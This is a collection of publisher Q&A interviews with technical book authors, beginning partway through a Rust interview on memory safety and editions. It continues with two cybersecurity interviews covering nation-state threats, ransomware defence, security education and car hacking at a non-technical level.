NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile time. Properties like thread safety and exclusive mutability are enforced at the type level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistant through typestate programming, which is very hard to pull off in less strict languages like C.
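Typestate programming can be sketched in a few lines (illustrative types of my own, not from the book): each state gets its own type, and state transitions consume the old value, so using an object in the wrong state is a compile error rather than a runtime bug:

```rust
// An open connection: queries are only possible on this type.
struct OpenConn {
    queries: u32,
}

// A closed connection: no `query` method exists here at all.
struct ClosedConn {
    queries_run: u32,
}

impl OpenConn {
    fn connect() -> OpenConn {
        OpenConn { queries: 0 }
    }

    // Querying requires exclusive access to an *open* connection.
    fn query(&mut self, _sql: &str) -> u32 {
        self.queries += 1;
        self.queries
    }

    // `close` takes `self` by value, consuming the open connection:
    // the old handle can never be used again after this call.
    fn close(self) -> ClosedConn {
        ClosedConn { queries_run: self.queries }
    }
}

fn main() {
    let mut conn = OpenConn::connect();
    conn.query("SELECT 1");
    let closed = conn.close();
    // conn.query("SELECT 2"); // compile error: `conn` was moved by `close`
    assert_eq!(closed.queries_run, 1);
}
```

The move semantics do the work here: because `close` consumes the value, "use after close" is unrepresentable, which is exactly the kind of misuse-resistance that is hard to express in C.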

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represents a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance-fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is 'static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle toward a better Rust. That sentiment is best summarized by David Tolnay’s own quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to crates.io to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.
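In concrete terms, a crate opts into an edition through a single field in its manifest. A minimal sketch (the crate name here is hypothetical):

```toml
# Cargo.toml – the edition is a per-crate setting, so this crate can use
# 2021-edition syntax while its dependencies stay on 2015 or 2018.
[package]
name = "my-crate"      # hypothetical name
version = "0.1.0"
edition = "2021"
```

Because the edition is declared per crate, the compiler can build each dependency under the edition it was written for and still link everything together.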

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).
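As a sketch of what that looks like in practice, an ordinary Cargo version requirement is interpreted as a semver range: Cargo is free to pull in any compatible release, but never one whose major version number signals a breaking change.

```toml
# Cargo.toml – "1.0" is shorthand for the caret requirement "^1.0",
# i.e. >=1.0.0 and <2.0.0: bug fixes and additions, but no breaking changes.
[dependencies]
serde = "1.0"
```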

NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The "Crust of Rust" videos cover some of the same topics as the book, and the book covers topics from my videos, but often in fairly different ways. I think it’s likely that consuming both still leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit

Cracking Cybercrimes with Threat Analyst Jon DiMaggio

Our illuminating Author Spotlight series continues this month with Jon DiMaggio – author of The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime (March 2022). In the following Q&A, we talk with him about the difference between traditional threats and nation-state attacks, the reasons that critical infrastructure is an easy target for threat actors, the emerging "magic formula" for defeating ransomware, and the fact that just because you're paranoid doesn't mean they aren't targeting you on social media.


DiMaggio is a recognized industry veteran in the business of “chasing bad guys,” with over 15 years of experience as a threat analyst. Currently he serves as chief security strategist at Analyst1, and his research on Advanced Persistent Threats (APTs) has identified enough new tactics, techniques, and procedures (TTPs) to garner him near-celebrity status in the cyber world. A fixture on the speaker circuit and at conferences, including RSA (and this month’s CYBERWARCON), DiMaggio has also been featured on Fox, CNN, Bloomberg, Reuters TV, and in publications such as WIRED, Vice, and Dark Reading. He continues to write professional blog posts, intel reports, and white papers on his research into cyber espionage and targeted attacks – insights that have been cited by law enforcement and used in nation-state indictments.

No Starch Press: You’re known as one of the first intelligence analysts to focus on attacks executed by nation-state hacking groups – referred to as Advanced Persistent Threats. What’s the difference between traditional cyberattacks and APTs?

Jon DiMaggio: Traditional cybercriminals conduct attacks relying on a user to click a link in an email or visit a specific website. If the attack fails or security mechanisms defeat the threat before it can successfully infect a victim, the attack is over. That's why, with some exceptions, traditional attacks are aimed at targets of opportunity, not tailored to a specific victim.

Nation-state attacks, however, are the exact opposite. Nation-state attackers target specific victims, and are not only motivated but well-resourced. These advanced attackers have the backing of a government, and often develop their own malware and infrastructure to use in their attacks. Also, unlike traditional threats, nation-state attackers are rarely motivated by financial gain. Instead, they seek to steal intellectual property, sensitive communications, and other data types to advance or provide an advantage to their sponsoring nation.

NSP: Governments and militaries are no longer the only targets of nation-state hackers – private-sector companies are now under attack as well. Most of them already have automated security mechanisms, but are those an adequate defense against APTs?

JD: No. Due to the human element behind nation-state attacks, automated security defenses are not enough. Human-driven attacks simply return to the system through another door. And unlike other threats, nation-state attackers are in it for the long game, which is why the attacks continue even if initially defeated by automated defenses. For these reasons, you must handle nation-state attacks differently than any other threat your organization will face – ideally, by deploying human threat hunters.

NSP: Another disturbing trend is the growing list of advanced cyber threats targeting the industrial control systems (ICS) of critical infrastructure, like the U.S. power grid. In terms of cyberwarfare, are we getting closer to seeing intrusion campaigns against our electrical, water, and transportation systems escalate from espionage or reconnaissance missions to highly disruptive attacks that could paralyze entire cities?

JD: Not only are attackers getting closer to our critical infrastructure, it has already happened in other countries. In 2015, the Russian government conducted cyberattacks that shut down power across critical areas of Ukraine.

In 2017, when I worked at Symantec, our team discovered a Russia-based nation-state attacker we dubbed "Dragonfly," who infiltrated the U.S. power grid. The group was very close to gaining access to critical systems responsible for powering cities across the United States. In this case, security companies and the federal government worked together to mitigate the threat. This was a close call, but it shows that nation-states are targeting our power grid – and likely will continue the effort moving forward.

NSP: In early October, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning that ransomware attackers, in particular, have been targeting water treatment and wastewater facilities. Do you have any insight into why ransomware attackers have recently moved from banks, local governments, and healthcare systems to utility companies? Moreover, why are these critical facilities still so vulnerable to compromise given what we know about the threat and what’s at stake?

JD: Critical infrastructure appeals to ransomware attackers because they likely feel there is a greater chance the victim will pay. Additionally, the breach will be very apparent to the public, like in the Colonial Pipeline attack, when fuel stopped flowing and it resulted in a gas shortage across the East Coast. The effect of this type of attack is meant to be dramatic, and attackers know there will be high pressure from the general public to recover quickly. Usually, the fastest way to recover is to pay the ransom and obtain the decryption key.

Also, critical infrastructure often provides an easy target to savvy attackers. For example, when a cybercriminal attacked the water system in Florida last year, he did so by taking advantage of technology and infrastructure that allowed workers to remotely access the critical controls used to regulate the system. In short, the ease of access for city workers was more important than the system's security. This, unfortunately, is a common problem. Addressing many of these existing vulnerabilities will require building systems around security – not ease of use. While this may be less important to a retail provider, it should not be an option for industries involved with our infrastructure.

NSP: Over the past year you’ve focused your expertise on nation-state ransomware. One thing I’ve learned from your work is just how long sophisticated intruders spend in a victim’s network before kidnapping their data and sending a ransom notice, often lurking for weeks if not months. Why is attacker “dwell” time an important security metric?

JD: Yes, that's a point many security analysts are unaware of. Enterprise ransomware gangs spend between 3 and 21 days on a victim network, with the average being around 10 days. During this time, the attacker enumerates the network, obtains and escalates privileges, disables security services, deletes backups, and steals the victim's sensitive data. Finally, once the staging and data-theft phase is complete, they execute the ransomware payload throughout the victim's network.

The reason this timeframe is so important is that the human attacker is active on your network. The takeaway is that the longer the attacker engages within your network, the better chance a good threat-hunting team will have to find them. This is why I keep emphasizing that you really need a human team to hunt for advanced threats, not simply rely on automated defenses.

NSP: As ransomware has evolved and diversified, AI has found its way into the mix, turbo-charging attacks that can automatically scan networks for weaknesses, exploit firewall rules, find open ports that have been overlooked, and so on. But machine learning works both ways. What role could AI tools play in threat hunting?

JD: The combination of artificial intelligence and human threat hunters creates the magic formula necessary to defeat ransomware attacks. AI is one of the fastest and most accurate ways to identify suspicious or malicious activity and make quick mitigation decisions.

Based on the level of success ransomware gangs have had in recent years, current identification and mitigation capabilities are not working. At least, not consistently. In fact, several security vendors already base their technologies on artificial intelligence to mitigate threats. For example, the cybersecurity company Darktrace recently used its tech – which relies on AI – to defeat a LockBit ransomware attack. (LockBit is a particularly pernicious ransomware-as-a-service gang that specializes in fast encryption speeds.) Using AI, Darktrace identified and mitigated the attack within mere hours of its appearance in the environment.

NSP: Sounds like the AI future is nigh! Shifting tracks, let's wrap this Q&A up in the present. You chase bad guys for a living. And not just any bad guys – the kind who could bring an entire nation to its knees. But you’re also a dad. Do you talk to your kids about what you do? If so, how do you explain things like nation-state attacks, ransomware gangs, or cyberwarfare on their level (or at least in a way that sounds less scary) when they ask about your day?

JD: I do talk to my kids about what I do. I actually try to get them involved, and spend time teaching them and explaining some of the work I do at a high level. My youngest son Damian and I even did a podcast together on ransomware. My oldest son Anthony is a freshman in high school and just started taking cyber security classes this year.

They think what I do is more like what they see in the movies, so they will be in for a disappointment when they figure out it’s more research, analysis, and writing than hacking bad guys. However, it’s very rewarding that they have an interest in what I do, and they often brag to their friends about it. At the same time, they've seen me working with encoded text and malware, and they make comments that I stare at “gibberish” all day and pretend to be working! But overall they are really proud of me and think what I do is “cool.”

NSP: Part of your objectively "cool" job entails thinking like the adversary. While it seems unlikely a nation-state actor would hijack a home webcam or set up a fake WAP attack at the local cafe, are there any lessons you've learned from a career spent analyzing cyber criminals that inform your personal online security habits outside of work, or that you try to instill in your children?

JD: Yes, due to my work I have a very different, limited online life. For example, outside of work-related social media, I have no personal accounts. And even with my limited social-media presence, I do not ever connect with family members – only work colleagues. I've used social media to map out relationships with adversary accounts, and know that someone could do the same to me. For that reason, I don’t use personal social media and, unfortunately for them, at least for now, my kids don't either. It’s not that I'm over-protective, but I don’t want them targeted by an attacker in an effort to get to me. And, to be honest, I think it's healthier at this point to let them just be kids – they will have an entire lifetime to be engulfed in social media.

As for my personal habits online, I use three different identity monitoring and protection services to keep an eye on my accounts. I never use the same password twice, nor do I use real “dictionary words” – and I always use two-factor authentication in addition to a hardware key (YubiKey). I am religious about updating my passwords frequently, and you will never find a device in my home with a camera that is not covered. I also do not use traditional cloud-based services from vendors like Apple and Google.

To be honest, I live a pretty paranoid life because of the work I do and the fact that I put my name out there. At the same time, I think I need to be a bit paranoid, because if there is anything my job has taught me it is that anyone and anything can be hacked and compromised.

Cyber Defender Bryson Payne Takes Us to School

We continue the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series with Bryson Payne, PhD – author of Go H*ck Yourself: An Ethical Approach to Cyber Attacks and Defense (January 2022). In the following Q&A, we talk with him about training the next generation of cyber defenders, why there's never been a better time to get a job in infosec, the security benefits of thinking like an adversary, and whether ransomware could soon be coming for your car. (Spoiler alert: it's already here!)


Dr. Payne (@brysonpayne) holds the elite CISSP, GREM, GPEN, and CEH certifications, and is an award-winning cyber coach, author, TEDx speaker, and founding director of the Center for Cyber Operations Education at the University of North Georgia (an NSA-DHS Center for Academic Excellence in Cyber Defense). He's also a tenured professor of computer science at UNG, teaching aspiring coders and cyber professionals since 1998 – including coaching UNG’s champion NSA Codebreaker Challenge cyber ops team. His previous No Starch Press titles include the bestsellers Learn Java the Easy Way (2017) and Teach Your Kids to Code (2015).

No Starch Press: Cybersecurity Awareness Month is a great time to talk with you, because your career's been dedicated to making people aware of common and emerging security vulnerabilities. Recently though, high-profile hacks have hit the headlines like never before, with attacks on public utilities, government agencies, and customer databases causing real alarm among the general public. Are we starting to see a shift in the way mainstream society thinks about cybersecurity? If so, how can this be harnessed to make infosec stronger across the board?

Bryson Payne: All of us are seeing cyberattacks and breaches in the news, in the companies we do business with, and even in our own families. It’s a scary time to be so dependent upon technology, but there’s a bright side, yes – regular people are becoming smarter about how they use their devices, how they secure their information, and what information they share.

By understanding the threats that are out there, and how cybercriminals and cyberterrorists perform simple to complex attacks, you and I can protect ourselves and our families from cybercrime (or worse). And by training a new generation of cyber defenders, we can better protect our nation and our economy from future cyber threats.

NSP: You’re the founding director of the Center for Cyber Operations Education at UNG, where you’re also a tenured professor of computer science. So perhaps it’s no surprise that in 2018 UNG began offering a bachelor’s degree in cybersecurity – one of the nation’s first. Considering there are already a number of academic pathways that can lead to successful careers in the infosec world, what’s the benefit of pursuing such a specific major?

BP: The hands-on experience our students gain from real-world ethical hacking, forensics, network security, and reverse engineering in the classroom, in competitions, or in industry certifications, is more like what they’ll see in industry, government, and military cyber roles than traditional computer science or IT programs. In fact, the NSA and Department of Homeland Security are certifying more National Centers of Academic Excellence in Cyber Defense, like UNG, each year in order to give students the real-world skills needed to fight cybercrime, cyber terrorism, and even cyberwarfare for the next generation.

NSP: Does the addition of this degree program reflect a growing demand for cybersecurity pros in the workforce? And, for anyone reading this who’s considering going into the field (or going back to school to get credentialed), what are some of the career options you encourage students to explore?

BP: There are over 400,000 positions in cybersecurity open right now in the U.S. alone, with tens of thousands of new postings appearing every month. If you’re considering going into cyber, there’s never been a better time to get a certification, take a course, or study on your own.

If you like police dramas or mysteries, forensics could be a good fit. If you like taking things apart and (sometimes) putting them back together, reverse engineering or ethical hacking might be fun for you. If you like making sure everything works like it’s supposed to, you might make a great network operations or security operations center analyst. There’s a job for everyone, from trainers to managers to technicians – and the pay is growing faster than for many positions in non-security fields.

NSP: Studies have shown that at least half of college-age adults don’t pursue tech-related careers because they believe the subjects are too difficult to learn. What do you say to people who are interested in cybersecurity but don’t think they have what it takes?

BP: There are so many paths into cyber, whether you start out in psychology, journalism, international affairs, criminal justice, business, math, science, engineering, even health sciences. Cyber is a team sport, and we need people who understand not just the technology, but the people, processes, and even the cultures and languages involved in cybercrime, cyberattacks, and cyberwarfare. Every organization, from Fortune 500 companies to city governments, schools, and healthcare institutions, needs people like you and me thinking about cybersecurity and how to protect employees or customers.

While it's important to know that not every cyber job is a technical role, the more comfortable you are with the technology, the farther you can go.

NSP: Your upcoming book, Go H*ck Yourself, teaches readers how to perform just about every major type of attack, from stealing and cracking passwords to launching phishing attacks, using social engineering tactics, and infecting devices with malware. Some critics might find it ironic that a champion of cyber defense would write a book that literally teaches people how to execute malicious hacks. Explain yourself!

BP: Just like in a martial arts class, you have to learn to kick and punch while you’re learning to block kicks and punches – you have to understand the offense to be able to defend yourself. By thinking like an adversary, you’ll see new ways to protect yourself, your company, your family, and the devices and systems you rely on in your daily life.

For too long we’ve been told what to do, but not why we need to do it. A great example is the password cracking you mentioned. When a reader sees how quickly and easily they can crack a one- or two-word password, even with numbers and symbols added to it, they finally have the mental tools to understand why we’re advocating for passphrases of four or five words. It’s the same with all the other attacks – once you see what a hacker can do, you understand how important good cyber hygiene is, and how small steps to secure your devices can really pay off.
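The arithmetic behind that advice is easy to sketch. The figures below are illustrative assumptions (a ~100,000-word dictionary, a 7,776-word Diceware-style list), not numbers taken from the book:

```rust
// Back-of-the-envelope guess counts for two password styles.
fn main() {
    // One dictionary word (~100,000 candidates) with a two-digit suffix:
    // the kind of password that falls in seconds.
    let word_plus_digits: f64 = 100_000.0 * 100.0; // ~1e7 guesses

    // Four words chosen independently from a 7,776-word Diceware-style list.
    let passphrase: f64 = 7_776f64.powi(4); // ~3.7e15 guesses

    println!("word + digits:  {:.1e} guesses", word_plus_digits);
    println!("4-word phrase: {:.1e} guesses", passphrase);

    // The passphrase search space is hundreds of millions of times larger.
    assert!(passphrase / word_plus_digits > 1e8);
}
```

Every additional word multiplies the passphrase search space by another 7,776, which is why length beats bolted-on complexity.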

NSP: One type of attack that's really skyrocketed lately is ransomware. Your home state of Georgia is just one example – city and county governments, state agencies, hospital systems, even local election systems have fallen victim to ransom demands. With hackers hammering away at our institutional weak spots, something as simple as not installing a security patch right away, or clicking on a link in a socially engineered email can usher in a potentially devastating attack. What do you think can be done to prevent the human errors arguably fueling the current ransomware rage?

BP: Ransomware is definitely one of the most serious threats to your business, your family, and your own financial security. But the good news is that you can keep yourself from being an easy target. While the news often refers to humans as the weakest link, I actually see us as the best first line of defense. Employees and leaders who can spot phishing emails, who install updates and patches regularly, and who use good cyber hygiene can block more than 99% of known attacks before they get into your organization! And smart security-minded computer users can also apply these practices at home to protect themselves and their loved ones from online adversaries on the prowl for easy vulnerabilities.

NSP: Along those same lines, a lot of organizations have started backing up their files as a failsafe. But hackers being hackers, they’ve already adapted: double-extortion ransomware is now the norm, where the data’s exfiltrated before it’s encrypted so it can be released online if the ransom is not paid. How bad is the problem, and what's the solution?

BP: Double-extortion malware can have the most devastating financial impact short of cyber-physical attacks (and by that I mean when malware takes over a manufacturing facility, critical infrastructure, or medical facility and causes real-world, physical damage to real equipment or even endangers human life). It's true that backups used to be enough to recover from ransomware without paying the ransom, but these double-extortion attacks can steal data for months before locking down systems and demanding payment.

The best defense, in addition to those backups, is having well-trained cyber professionals doing what we call "active threat hunting" – looking for suspicious activity, like small file transfers overnight or to unknown networks, and tracking down systems that show indicators of attack or compromise. That’s why it’s important that we train more cyber defenders. Every organization needs cyber heroes now, so it's the perfect time to develop these skills.

NSP: Dr. Payne, you have arrived at your final destination. (Well, my last question anyway.) Over the past decade you’ve done some very cool conference presentations on car hacking, and have since turned them into a tutorial on your blog. The cool factor aside, this is an increasingly relevant skill set for aspiring white hats – since 2016 there’s been a 94% year-over-year increase in automotive cybersecurity incidents, including remote attacks that can control your steering, pump your brakes, shut down the engine, unlock your doors, open the trunk, etc.

1) Is it only a matter of time before ransomware infects this realm of life, with people, say, unable to start their car until they pay a hacker? 2) In the future, should automakers be pentesting cars at the level they perform crash tests? 3) Does this keep you up at night, or are you optimistic that your UNG graduates will have a solution?

BP: It is only a matter of time before we see ransomware and similar attacks regularly affecting smart cars. Today’s automobiles can have more than 40 computer chips, dozens of systems, and networks and connections from USB to 5G, Wi-Fi, Bluetooth, GPS, satellite radio, and more. We call that the “attack surface” of a system, and with so many ways for hackers to try to get into your vehicle, we’ve actually already seen successful remote attacks in the wild – and we’ll continue to see new ones. The good news is that every make and model is slightly different, so a hack that works on a Honda might not work on a Ford, and vice versa.

That being said, auto manufacturers have a responsibility to secure the networks and computer systems inside your vehicle and mine from malicious hackers, which is why I happen to believe that teaching young people how to test and secure these systems – starting within a virtual environment like we do in the book – is one of the best ways to protect our vehicles and our personal safety from ransomware on the roadway.